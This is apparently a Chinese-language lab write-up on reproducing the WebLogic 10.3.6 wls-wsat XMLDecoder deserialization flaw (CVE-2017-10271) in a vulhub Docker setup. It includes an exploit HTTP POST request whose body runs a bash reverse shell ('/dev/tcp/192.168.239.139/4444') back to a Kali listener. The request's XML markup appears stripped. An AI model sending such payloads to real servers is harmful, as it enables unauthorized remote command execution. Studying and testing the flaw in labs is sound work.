Weblogic 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞（CVE-2017-10271）

声明

好好学习，天天向上

漏洞描述

Weblogic的WLS Security组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可执行任意命令。

影响范围

10.3.6.0.0

12.1.3.0.0

12.2.1.1.0

12.2.1.2.0

复现过程

这里使用10.3.6.0版本

使用vulhub

cd /app/vulhub-master/weblogic/CVE-2017-10271

使用docker启动

docker-compose up -d

等待一段时间环境才能成功启动，访问如下链接

http://your-ip:7001/console/

访问如下链接，存在下图则说明可能存在漏洞

http://192.168.239.129:7001/wls-wsat/CoordinatorPortType11

上工具检测

https://pan.baidu.com/s/1bpg3ppl

反弹shell利用

kali监听4444端口

浏览器提交如下请求，重点在POST后的接口和POST请求体中的IP的端口

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.239.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

 





/bin/bash


-c


bash -i >& /dev/tcp/192.168.239.139/4444 0>&1

使用完后关闭镜像

docker-compose down

docker-compose常用命令

拉镜像（进入到vulhub某个具体目录后）

docker-compose build
docker-compose up -d

镜像查询（查到的第一列就是ID值）

docker ps -a

进入指定镜像里面（根据上一条查出的ID进入）

docker exec -it ID /bin/bash

关闭镜像（每次用完后关闭）

docker-compose down